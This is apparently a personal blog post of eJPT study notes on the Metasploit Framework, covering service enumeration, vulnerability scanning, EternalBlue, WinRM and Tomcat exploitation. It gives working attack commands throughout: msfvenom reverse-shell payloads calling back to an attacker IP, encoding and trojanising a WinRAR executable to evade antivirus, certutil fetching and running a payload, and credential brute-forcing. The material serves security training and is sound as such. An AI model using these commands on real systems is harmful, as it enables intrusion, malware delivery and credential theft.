eJPT - 3.3 The Metasploit Framework (I)
HmadIntroduction
The Metasploit Framework is an open-source, robust penetration testing and exploitation framework that is used by penetration testers and security researchers worldwide. It provides a robust infrastructure required to automate every stage of the penetration testing lifecycle.
It's used to develop and test exploits and has one of the world's largest database of public, tested exploits. It's designed to be modular, allowing for new functionality to be implemented with ease. The source code is available on GitHub and developers are constantly adding exploit modules.
There are 3 editions:
Metasploit Pro (Commercial)
Metasploit Express (Commercial)
Metasploit Framework (Community)
There are multiple interfaces:
MSFconsoleMSFcli(discontinued in 2015)Metasploit Community Edition (web GUI)
Armitage (Java GUI front-end)
Architecture
Module Types
| Module | Description |
| Exploit | Module that is used to take advantage of vulnerability and is typically paired with a payload |
| Payload | Code that is delivered by MSF and remotely executed on the target after successful exploitation. An example is a reverse shell that initiates a connection from the target system back to the attacker. |
| Encoder | Used to encode payloads to avoid AV (Anti-Virus) detection. For example, the shikata_ga_nai is used to encode Windows payloads. |
| NOPS | Used to ensure that payload sizes are consistent and ensure the stability of a payload when executed. |
| Auxiliary | Used to perform additional functionality like port scanning and enumeration. Cannot be paired with a payload |
Payload Types
1 - Non-staged Payload Payload is sent to the target system as it is with the exploit.
2 - Staged Payload The first part (stager) contains a payload that is used to establish a reverse connection back to the attacker to then download the second part of the payload (stage) and execute it.
The meterpreter payload is an advanced multi-functional payload that is executed in memory on the target system making it difficult to detect. It communicates over a stager socket and provides an attacker with an interactive command interpreter on the target system that facilitates the execution of system commands, file system navigation, keylogging, etc.
Metasploit Fundamentals
Distributed by Rapid7
Can be downloaded on Windows & Linux
Pre-installed on Kali
The Metasploit Framework Database (msfdb) is an integral part of the Metasploit Framework and is used to keep track of all your assessments, host data scans, etc. It uses PostgreSQL as the primary database server. It also facilitates the importation and storage of scan results from various third-party tools like Nmap and Nessus
Auxiliary Modules
The first step is to start up Metasploit and run a basic Nmap scan:
service postgresql start
msfconsole
workspace -a (name)
db_status
Useful commands to know about Metasploit to navigate:
hosts
services
db_nmap
search
use
show options
run
exploit
sessions
background
back
creds
loot
We can use auxiliary modules to do port scanning within Metasploit. It is used to perform scanning, discovery, and fuzzing. We can do TCP & UDP port scanning as well as enumerating services on those ports. Can also be used to discover hosts and perform port scanning on a different network subnet after we have obtained initial access on a target system.
You cannot pair these modules with payloads as they have nothing to do with exploitation. These modules can be used during the information gathering and post exploitation phases.
To explain this briefly, using Nmap, we can do information gathering on target 1. Once we have gained access to this system, we may find that there are other systems available via target 1, such as target 2. Now, we can't run Nmap here unless we install it on target 1 which is not recommended. This is where these auxiliary modules come in as we can perform a port scan on target 1 using target 2. We may also not have target 2's IP address or it may be not connected to the internet, therefore preventing us from using Nmap or scanning it from our device.
An example command within an auxiliary module:
search portscan
use (index of module)
set RHOSTS (target ip)
Auxiliary modules that are useful to know:
portscanudp_sweep
Service Enumeration
FTP Enumeration
FTP stands for the file transfer protocol. Normally on port 21 and is used to facilitate file sharing between a server and clients. Also frequently used to facilitate file sharing to and from the directory of a web server.
FTP authentication utilizes a username and password combination. However, in some cases, an improperly configured FTP server will allow anonymous login. We can use multiple auxiliary modules to enumerate information as well as perform brute-force attacks on an FTP server.
If you don't have a specific username or password to use with the brute-force option. Some very useful and comprehensive lists within Metasploit can be found here:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Some useful auxiliary FTP modules:
ftp_versionftp_loginftp/anonymous
SMB Enumeration
SMB stands for Server Message Block is a network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN). It uses port 445. On Linux, it's called SAMBA. We can use auxiliary modules to enumerate SMB shares, the version, users, and perform a brute-force attack in order to verify usernames and passwords.
A useful tip within Metasploit is to set a global variable to be the target IP, to prevent having to remember it or continually paste it.
setg RHOSTS (target ip)
Some useful auxiliary FTP modules:
smb_versionsmb_enumuserssmb_enumsharessmb_login
For example, you can use the command to list out the SMB shares and the next one to gain access:
smbclient -L \\\\ip\\ -U admin
smbclient \\\\ip\\public -U admin
Web Server Enumeration
A web server is software that is used to serve website data on the web. They utilize HTTP for communication between the client and the webserver. It is on port 80 while HTTPS is on 443. Popular webservers include Apache, Nginx, and Microsoft IIS. We can use auxiliary modules to enumerate the webserver version, HTTP header and brute-force directories.
Some useful auxiliary HTTP modules:
http_versionhttp_headerhttp_putrobots_txtdir_scannerdir_listingfiles_dirhttp_loginapache_userdir_enumbrute_dirs
MySQL Enumeration
It's an open-source relational database management system. It is typically used to store records, customer data, and is most commonly used to store web application data. It utilizes port 3306 by default but it can be hosted on any other open TCP port. We can use auxiliary modules to find out the version, perform brute-force attacks and identify passwords.
Some useful auxiliary MySQL modules:
mysql_versionmysql_loginmysql_enummysql_sqlmysql_schemadump
To then open the database outside the Metasploit framework once credentials have been found:
mysql -h (target ip) -u (username) -p
SSH Enumeration
SSH (Secure Shell) is a remote administration protocol that offers encryption and is the successor to Telnet. It is typically used for remote access to servers and systems. It uses port 22 by default but can be configured to run on any port. We can use auxiliary modules to enumerate the version of SSH as well as perform brute-force attacks to identify passwords to exploit it.
If a target has been configured to use passwords for encryption, then we use the ssh_login module. If it has been configured to use a public and private key for encryption, then we use the ssh_login_pubkey module.
Some useful auxiliary SSH modules:
ssh_versionssh_loginssh_enumusers
SMTP Enumeration
SMTP stands for Simple Mail Transfer Protocol. It uses port 25 by default but can be configured to run on 465 and 587 if it has SSL/TLS running. We can use auxiliary modules to enumerate the version of SMTP and user accounts on the target system.
Some useful auxiliary SMTP modules:
smtp_versionsmtp_enum
Vulnerability Scanning
As we know we can use the search function within Metasploit to search for exploit or auxiliary modules pertaining to a target. We can also use searchsploit to find Metasploit modules for a specific service.
searchsploit "Microsoft IIS" | grep -e "Metasploit"
Another technique is using the db_autopwn plugin which is available on GitHub here. I have previously covered this is the vulnerability assessment section but I'll cover it again.
To download the tool:
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
To move it into the metasploit framework
cd metasploit-autopwn
mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
To load it within metasploit:
load db_autopwn
db_autopwn -h
If you've enumerated all the information within Metasploit, we can then use autopwn to search for exploits or vulnerabilities according to the target ports open on the system.
db_autopwn -p -t
We can utilize the -PI option to specify a port or a port range.
We can also use the analyze command to analyse an IP within the Metasploit framework for vulnerabilities which it has detected for which exploits are available.
Nessus
It's a proprietary vulnerability scanner developed by Tenable. We can perform a scan on a target system which we can then import into Metasploit for analysis and exploitation. It automates the process of identifying vulnerabilities and provides us with information pertinent to a vulnerability like the CVE code.
There is a paid and free version of Nessus. The free version allows us to scan up to 16 IP addresses. We can access the link here and you can register for free to get the activation code.
Once you've completed a scan with Nessus, you can export the results as a .nessus file. We can then import this into the Metasploit framework using db_import. We can then go through these results and look for CVE codes. Then we can search for exploit modules using those CVE codes:
search cve:(enter the year) name:(the service)
Alternatively, within the Nessus framework on the web, we can use the filter to filter out the results where Metasploit exploit modules are available. We can click on it and find the specific module name to run and gain a meterpreter session on the target.
WMAP
WMAP is a tool which we use to web application vulnerability scanning. It can be used to automate web server enumeration. It's available as an MSF plugin and can be loaded directly into MSF. It can be integrated within the Metasploit Framework Database.
To load WMAP within Metasploit:
worskspace -a Web_Scan
load wmap
To add a site to scan:
wmap_sites -a (target ip)
To set up our target:
wmap_targets -t http://(target_ip)/
To search for useful auxiliary modules for our target:
wmap_run -t
To then run those auxiliary modules:
wmap_run -e
To list out the vulnerabilities that wmap has found:
wmap_vulns -l
We can use the module http_put to test whether or not we can upload a file to a directory. If we can, then it can be exploited by uploading a malicious file.
Payloads
A client-side attack is an attack vector that involves coercing a client to execute a malicious payload on their system that consequently connects back to the attacker when executed. They typically utilize various social engineering techniques like generating malicious documents or portable executables (PEs). They take advantage of human vulnerabilities as opposed to vulnerabilities in services or software running on the target system.
Note that given this attack vector involves the transfer and storage of the malicious payload on the client's system, attackers need to be cognisant of AV (Anti-Virus) detection.
Msfvenom
We can use it to generate payloads and encode them for various systems.
To tell the difference between staged and non-staged payloads, msfvenom will show the type of shell (for example meterpreter) followed by a forward slash or an underscore. The forward slash means that it's a staged payload and the underscore means that it's a non-staged payload.
Staged Payload:
windows/x64/meterpreter/reverse_tcp
Non-staged Payload:
windows/x64/meterpreter_reverse_tcp
Generating Payloads
When generating a payload, it's a good idea to specify the architecture of the target system, followed by the payload. You then need to specify your IP address and the listening port (if required). We now need to select the format option to output it in the specific format you want and the location to store the file. As an example of 32-bit and 64-bit payloads:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f exe > ~/Desktop/win_payloadx86.exe
or
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f exe > ~/Desktop/win_payloadx64.exe
To generate a 32-bit Linux payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf > ~/Desktop/linux_payloadx86
You can list out the formats in which you can export your payload:
msfvenom --list formats
Let's say we now wanted to transfer our payload to the target system. We could do so by setting up a web server. We can then open the web server on the target system and download the executable. Once we have set up our listener, we can execute it on the target system.
sudo python -m SimpleHTTPServer 80
To set up our meterpreter handler or listener:
use multi/handler
set payload (the payload option that you selected with msfvenom)
set LHOST (the ip address you selected with msfvenom)
set LPORT (the port you selected with msfvenom)
Encoding Payloads
Most AV (Anti-Virus) solutions utilize signature based detection in order to identify malicious files or executables. We can evade older signature based AV solutions by encoding our payloads. Encoding is the process of modifying the payload shellcode with the objective of modifying the payload signature.
Note that this technique is no longer really used as most of the current AV solutions have a huge database of signatures which makes it very difficult to mask a payload. But it may work on older AVs or Windows Defender on older versions of Windows.
Shellcode is a piece of code typically used as a payload for exploitation. It gets its name from the term command shell, whereby shellcode is a piece of code that provides an attacker with a remote command shell on the target system.
We can list out the encoders within msfvenom with the following command:
msfvenom --list encoders
The best encoder to use is the shikata_ga_nai encoder for both Windows & Linux systems. For example to encode a 32-bit payload:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -e x86/shikata_ga_nai -f exe > ~/Desktop/encodedx64.exe
You can encode a payload multiple times. The more you encode it or the number of iterations you do, the higher chance of success you will have again an AV. You can use the option -i to specify how many times you'd like to encode it. As as example:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > ~/Desktop/encodedx64.exe
Injecting Payloads
We can inject payloads into executable files to evade AV. We can use the -X option to specify a custom executable file to use as a template. We can also use the -k option with it to preserve the template behaviour and inject the payload as a new thread.
On of the best injectable (as some executables will not allow you to inject payload) payloads is the WinRAR executable for Windows. We can generate a payload and then inject it into the WinRAR executable.
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -X > ~/Downloads/wrar602.exe > ~/Desktop/winrar.exe
Since we didn't specify the -k option, the file (or WinRAR executable) will not run as a WinRAR file and will only run the payload. However, it will still show that within the meta data that it's the WinRAR archiver, etc. So to be more sneaky, we can use the -k option to keep the functionality of the executable while also executing the payload. However, this will not work with a lot of executables so just be aware.
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -X > ~/Downloads/wrar602.exe > ~/Desktop/winrar.exe
In this case, the WinRAR executable file doesn't allow us to to inject a payload while keeping the original functionality.
Automating Metasploit
Metasploit resource scripts are a great feature of MSF that allow you to automate repetitive tasks and commands. They operate similarly to batch scripts (on Windows), whereby, you can specify a set of commands that you want to execute sequentially.
You can load the script with Metasploit and automate the execution of the commands you specified in the resource script. We can use these resource scripts to automate various tasks like setting up multi handlers as well as loading and executing payloads.
The scripts that Metasploit runs can found in the following path:
/usr/share/metasploit-framework/scripts/resource/
To automate setting up a multi handler:
vim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.10
set LPORT 1234
run
We can then write and quit from the vim text editor. To now load it:
msfconsole -r handler.rc (or path to the script)
You can load resource scripts from within the Metasploit console:
resource ~/Desktop/handler.rc
You can also make a resource script using the previous commands you typed within msfconsole.
makerc ~/Desktop/new.rc
Windows Exploitation
HTTP File Server
In this case, there is a vulnerable HTTP file server on port 80 on the target. We can perform some service version detection and maybe run an Nmap script on port 80 for information. We can then use searchsploit to search for hfs exploits. There is a Metasploit module to exploit this to gain a meterpreter session.
CVE-2017-0144 EternalBlue
The Windows SMB vulnerability EternalBlue (MS17-010 / CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
It was developed by the NSA and then leaked to the public by a hacker group called the Shadow Brokers in 2017. It takes advantage of a vulnerability in the SMBv1 protocol that allows attackers to send specially crafted packets that allow to get a meterpreter session or a reverse shell.
It was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
It affects multiple versions of Windows:
Windows Vista
Windows 7
Windows Server 2008
Windows 8.1
Windows Server 2012
Windows 10 (only a certain build)
Windows Server 2016
Microsoft released patch for vulnerability in 2017 but many systems and companies have not yet patched their systems. It has an MSF auxiliary module that can be used to check if a target system is vulnerable to the exploit. It also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
The auxiliary module - smb_ms17_010 The exploit module - ms17_010_eternalblue
You can also manually exploit the vulnerability by utilizing publicly available exploits. To exploit it manually, it's called AutoBlue-MS17-010 and can be found here.
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py (target ip) shellcode/sc_x64.bin
You can check if a system is vulnerable to this attack via Nmap:
nmap -sV -p445 --script=smb-vuln-ms17-010 (target ip)
Tip to set up a netcat listener:
nc -nvlp (the port you are listening on)
WinRM
This is a feature that runs on Windows but it's not configured by default. It stands for Windows Remote Management protocol. It can be used to facilitate remote access with Windows systems over HTTP(S). It implements access control and security for communication between systems through various forms of authentication, either by a normal username and password or a username and a hashed password.
It is typically used in the following ways:
Remotely access and interact with Windows hosts on a LAN
Remotely access and execute commands on Windows systems
Manage and configure Windows systems remotely
WinRM normally runs on port 5985 or port 5986 if SSL is enabled.
We can use a tool called Crackmapexec to perform a brute-force attack on WinRM in order to identify users and their passwords as well as to execute commands on the target system. We can also use a ruby script called evil-winrm to obtain a command shell session on the target system.
Note that you can also use Crackmapexec on MsSQL, SMB, SSH as well as WinRM.
crackmapexec winrm target_ip -u administrator -p /usr/sahre/metasploit-framework/data/wordlists/unix_passwords.txt
crackmapexec winrm target_ip -u administrator -p password -x "whoami"
To now obtain a shell, we can use evil-winrm.
evil-winrm -u usernmae -p 'password' -i target_ip
You can also obtain a meterpreter session via Metasploit. There is an exploit module called winrm_script_exec. It will require credentials before being exploited.
Apache Tomcat
Apache Tomcat, is a popular, free and open-source Java servlet web server. It's used to build and host dynamic websites and web applications based on the Java software platform. It utilizes the HTTP protocol to facilitate the underlying communication between the server and the clients. It runs on port 8080 by default.
The standard Apache HTTP web server is used to host static and dynamic websites or web applications, typically developed in PHP. On the other hand, the Apache Tomcat web server is primarily used to host dynamic websites or web applications developed in Java.
Any version of Apache Tomcat below V9 is vulnerable to a remote code execution vulnerability that could potentially allow an attacker to upload and execute a JSP payload in order to gain remote access to the target server. We can utilize a pre-built MSF exploit module, tomcat_jsp_upload_bypass to exploit it and consequently gain access to the target.
There are three payloads we can use, the first being the default one, the second being:
set payload java/jsp_shell_bind_tcp
This will give us a command shell session. To get a meterpreter session, we can generate a Windows meterpeter payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f exe > meterpreter.exe
We can then set up a web server to host the payload.
sudo python -m SimpleHTTPServer 80
We can then head to the command shell and download the payload.
certutil -urlcache -f http://10.10.10.10/meterpreter.exe meterpreter.exe
Now, we need to set up our handler within Metasploit. Then we can execute the payload.
.\meterpreter.exe
That’s it for the first part of this section. Next one up is the second part.
— Hmad
Subscribe to my newsletter
Read articles from Hmad directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Hmad
Hmad
I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.